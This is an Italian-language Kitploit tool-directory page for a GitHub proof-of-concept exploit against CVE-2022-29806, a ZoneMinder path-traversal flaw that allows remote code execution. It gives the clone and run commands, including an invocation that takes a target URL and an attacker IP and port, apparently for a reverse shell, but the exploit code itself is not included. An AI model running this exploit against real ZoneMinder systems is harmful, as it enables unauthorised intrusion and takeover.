Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2022-29806 — ZoneMinder fino alla 1.36.12 - escalation dei privilegi tramite Language (e RCE) - Exploit PoC | Kitploit
Strumenti/GitHubGitHub/sigm0n/cve-2022-29806
Escalation di PrivilegiAnalisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration TestingStrumento di Accesso Remoto
GitHubsigm0n/cve-2022-29806

CVE-2022-29806

ZoneMinder fino alla 1.36.12 - escalation dei privilegi tramite Language (e RCE) - Exploit PoC

Vedi Repository
31 anno faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2022-29806

ZoneMinder fino alla 1.36.12 - escalation dei privilegi del linguaggio (e RCE)

alt img

Descrizione

Una vulnerabilità di Path Traversal nel file di log di debug e nell'opzione della lingua predefinita in ZoneMinder precedente alle versioni 1.36.13 e 1.37.11 consente agli attaccanti di scrivere ed eseguire codice arbitrario per ottenere l'esecuzione di comandi remoti.

"La prova di concetto è stata testata su ZoneMinder 1.36.4 ubuntu18.04 docker: ZoneMinder/zmdockerfiles, ma è comunque applicabile fino alla versione più recente 1.36.12"

Utilizzo

root@kitploit:~
git clone https://github.com/OP3R4T0R/CVE-2022-29806
cd CVE-2022-29806
python3 exploit.py
root@kitploit:~
python3 exploit.py -t <target_url> -ip <attacker_ip> -p <port>
python3 exploit.py -t <target_url> -ip <attacker-ip> -p <port>

Requisiti

root@kitploit:~
pip3 install beautifulsoup4
pip3 install argparse
pip3 install requests

Crediti

krastanoel ha scoperto la vulnerabilità.

Scarica lo strumento